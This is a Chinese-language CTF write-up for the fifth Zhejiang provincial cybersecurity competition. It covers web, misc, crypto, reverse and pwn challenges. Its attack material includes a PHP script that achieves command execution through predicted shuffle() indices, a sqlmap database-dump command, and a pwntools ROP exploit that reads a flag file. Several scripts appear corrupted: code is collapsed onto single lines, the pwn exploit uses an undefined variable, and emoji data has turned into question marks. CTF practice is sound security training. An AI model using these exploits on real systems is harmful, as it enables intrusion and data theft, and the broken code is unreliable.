浙江省第五届网络安全竞赛部分WP

WriteUp 2年前 (2022) admin
852 0 0

团队成绩

队伍名称:7coin

队伍成绩:15


web

ezphp

开局给了源码,shuffle用来打乱顺序 但是他的顺序是根据种子来的

种子又是根据时间来的,所以我们可以提前算出时间 找出函数所在数组下标

算好后发送

$a[$_GET['b']]($a[$_GET['c']]);

调用system(“cat /flag”)得到flag

<?phperror_reporting(0);function getPOS($time_){  mt_srand($time_);  $a = array("system","ls");  for ($i=0;$i<=10000;$i++){    array_push($a,"Ctfer");  }  shuffle($a);  //$a[$_GET['b']]($a[$_GET['c']]);  echo "ntime:" . time() . "|";  $system = "";  $ls = "";  for($i=0;$i<10003;$i++){    if($a[$i] == "system"){      $system = $i;    }    if($a[$i] == "ls"){      $ls = $i;    }  }  return [$system,$ls];}for ($i=0; $i < 1; $i++) {   $pos = getPOS(time() + $i);  $system = $pos[0];  $ls = $pos[1];  $payload = "curl http://1.14.97.218:29787/?cmd=cat%20/flag&b=$system&c=$ls";  echo shell_exec($payload);}//echo (shell_exec("curl $payload"));//echo "ntime:" . time() . "|";

babysql

sqlmap直接跑,加tamper—space2comment模块

python3 sqlmap.py -u url -D ctf --dump --batch --tamper=space2comment

浙江省第五届网络安全竞赛部分WP



misc

checkin_gift

010打开中间的字符串—rot13—两次base64—glzj的 gift 那串

浙江省第五届网络安全竞赛部分WP

提取字符串:

FIWOIxqEZyIWJwIHEH1nJR1AZyECGyWKE1IME0qnFyMUAIAHF09ZE0qAJxEQGxcMFRSMIRSADyqAJGWHGIcHAD==

浙江省第五届网络安全竞赛部分WP

提取字符串:

SVJBVkdRMlVJWjVURU1aWE1NMlRPTlJXR1VZR0daSlZHNVNUS09MR0dNWkRDTkpZSEFZVEFNQldNWTJUTVpUNQ==
 base64-base32

浙江省第五届网络安全竞赛部分WP

Unkn0wnData

文件尾部base64转文本,拿到emoji

??????????✅????ℹ⌨??✉?????ℹ☺?❓??????☃????????????????✅??????????????☺?????⏩??????✖???????

emoji aes加密

浙江省第五届网络安全竞赛部分WP

拿到usb流量

浙江省第五届网络安全竞赛部分WP

data:000010000000000000000c000000000000000e000000000000002a000000000000001000000000000000040000000000000008000000000000002a0000000000000016000000000000000b000000000000000c000000000000001c000000000000002a000000000000002c0000000000020034000000000000002a0000000000020009000000000000000c000000000000001100000000000000070000000000020017000000000000002a0000000000020017000000000000000b00000000000000080000000000000012000000000000002a000000000002001500000000000000080000000000000004000000000000000f000000000000000a000000000000002a000000000002000e0000000000000008000000000000001c000000000000000a000000000000002a000000000000000400000000000000110000000000000007000000000000000f000000000000002a00000000000200100000000000000004000000000000000e00000000000000080000000000000008000000000000002a000000000002000c0000000000000017000000000002001e0000000000000007000000000000002a0000000000

解析脚本

import os# /*os.system("tshark -r test.pcapng -T fields -e usb.capdata > usbdata.txt")*/normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":""","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}

nums = []keys = open('key.txt')for line in keys: #print(line) if len(line)!=17: continue nums.append(line[0:2]+line[4:6]) #取一、三字节 #print(nums)keys.close()output = ""for n in nums: if n[2:4] == "00" : continue if n[2:4] in normalKeys: if n[0:2]=="02": output += shiftKeys [n[2:4]] else : output += normalKeys [n[2:4]] else: output += '[unknown]'print('output :' + output)

拿到

output :mik<DEL>mae<DEL>shiy<DEL><SPACE>:<DEL>FindT<DEL>Theo<DEL>Realg<DEL>Keyg<DEL>andl<DEL>Makee<DEL>It!d

密码是:Toggled

得到flag:DASCTF{ad15eecd2978bc5c70597d14985412c4}

m4a

010打开发现逆序文件头


浙江省第五届网络安全竞赛部分WP


逆置输出

def Re(inputfile, outputfile):  hex_list = []  with open(inputfile, 'rb') as f:    while True:      a = f.read(1)      if (not a):        break      hex_list.append(a)    mylist = hex_list[::-1]    with open(outputfile, 'wb') as f:      for value in mylist:        f.write(value)    print("complete!")Re("m4a", "flag.zip")

添加文件头

浙江省第五届网络安全竞赛部分WP

解析音频文件

浙江省第五届网络安全竞赛部分WP

摩尔斯解码

浙江省第五届网络安全竞赛部分WP

得到压缩包密码

浙江省第五届网络安全竞赛部分WP


rot47解码

浙江省第五届网络安全竞赛部分WP


ciphey解码

浙江省第五届网络安全竞赛部分WP


crypto

math

key为n-1的阶乘,由威尔逊定理得key*(n-1)=1%n,对n-1求逆即可求出key

import gmpy2from Crypto.Util.number import *import math
str = 'abcdefghijklmnopqrstuvwxyz0123456789+='n = 176778040837484895481963794918312894811914463587783883976856801676290821243853364789418908640505211936881707629753845875997805883248035576046706978993073043757445726165605877196383212378074705385178610178824713153854530726380795438083708575716562524587045312909657881223522830729052758566504582290081411626333
key = n - 1c = 'u66hp7nuh01puoaip10pi6o0vzavnu11'flag = ''for i in c: num = str.index(i) ans = (num - 7) * gmpy2.invert(key,37) % 37 flag += str[ans]print('DASCTF{'+ flag +'}')#DASCTF{799a03b7a82076f5028059681df1b722}

rssssssa

Coppersmith攻击,已知低位p,则

ZmodN=Zmod(n)f(x) = x*ZmodN(pow(2,p0.nbits()))+p0

在p 的低位泄露时因为不确定缺失高位的具体比特数,所以要在浙江省第五届网络安全竞赛部分WP附近作X的阈值估计;

无法确定拿到的 p 是否大于 q,所以对 β=0.5 进行调整至 0.4。

在低位p的位数不足p的一半时,可以爆破几位p来增加已知低位p的位数

浙江省第五届网络安全竞赛部分WP

from Crypto.Util.number import *import tqdm
n = 21595945409392994055049935446570173194131443801801845658035469673666023560594683551197545038999238700810747167248724184844583697034436158042499504967916978621608536213230969406811902366916932032050583747070735750876593573387957847683066895725722366706359818941065483471589153682177234707645138490589285500875222568286916243861325846262164331536570517513524474322519145470883352586121892275861245291051589531534179640139953079522307426687782419075644619898733819937782418589025945603603989100805716550707637938272890461563518245458692411433603442554397633470070254229240718705126327921819662662201896576503865953330533c = 1500765718465847687738186396037558689777598727005427859690647229619648539776087318379834790898189767401195002186003548094137654979353798325221367220839665289140547664641612525534203652911807047718681392766077895625388064095459224402032253429115181543725938853591119977152518616563668740574496233135226296439754690903570240135657268737729815911404733486976376064060345507410815912670147466261149162470191619474107592103882894806322239740349433710606063058160148571050855845964674224651003832579701204330216602742005466066589981707592861990283864753628591214636813639371477417319679603330973431803849304579330791040664p = 1426723861968216959675536598409491243380171101180592446441649834738166786277745723654950385796320682900434611832789544257790278878742420696344225394624591657752431494779e = 65537PR.< x > = Zmod(n)[]for i in tqdm.tqdm(range(2 ** 15)): i = Integer(i) f = p + i * 2 ** (560) + x * 2 ** (560 + i.nbits()) res = f.monic().small_roots(X = 2 ^ (1024 - 560 - i.nbits()), beta=0.4) if res: print(res) p = p + i * 2 ** (560) + int(res[0]) * 2 ** (560 + i.nbits()) q = n // p if p * q == n: d = inverse(e,(p - 1) * (q - 1)) print(long_to_bytes(int(pow(c,d,n))))#b'DASCTF{ce73935b2e83a78aa5079a9e59ae4980}'

reverse

ezandroid

apk反编译,一个个翻就看到了


浙江省第五届网络安全竞赛部分WP

浙江省第五届网络安全竞赛部分WP


pwn

GO-MAZE-v4

浙江省第五届网络安全竞赛部分WP

exp:

from pwn import *from time import *
context.log_level='debug'p=remote(ip,port)elf=ELF('./pwn')anjian='sssssdddwwwdddwdww's=0for i in anjian: for j in range(10): p.recvline() if i=='w': s+=1 if s>5: pass p.sendline(i)
popRax=0x0000000000400a4fsyscall=0x00000000004025abpopRdi=0x00000000004008f6popRsi=0x000000000040416fpopRdx=0x000000000051d4b6popRbx=0x0000000000402498popDxSi=0x000000000051d559buf=0x98a000leave=0x00000000004015cb#sysread=0x51D715#read write openpayload=p64(0)+p64(popRax)+p64(2)#openpayload+=p64(popRdi)+p64(0x0000000000af2faf)payload+=p64(popRsi)+p64(0)payload+=p64(syscall)payload+=p64(popRax)+p64(0)payload+=p64(popRdi)+p64(3)payload+=p64(popRsi)+p64(buf)payload+=p64(popRdx)+p64(0x100)payload+=p64(syscall)payload+=p64(popRax)+p64(1)payload+=p64(popRdi)+p64(1)payload+=p64(popRsi)+p64(buf)payload+=p64(popRdx)+p64(0x100)payload+=p64(syscall)rec=b''pa+=p64(popRdi)+p64(0)pa+=p64(popDxSi)+p64(0x100)+p64(buf+0x300)pa+=p64(syscall)+p64(leave)p.recvuntil('flag')p.sendline(b'a'*0x178+p64(buf+0x300)+rec)sleep(2)p.send(payload)p.interactive()

浙江省第五届网络安全竞赛部分WP





原文始发于微信公众号(7coinSec):浙江省第五届网络安全竞赛部分WP

版权声明:admin 发表于 2022年9月26日 下午6:10。
转载请注明:浙江省第五届网络安全竞赛部分WP | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...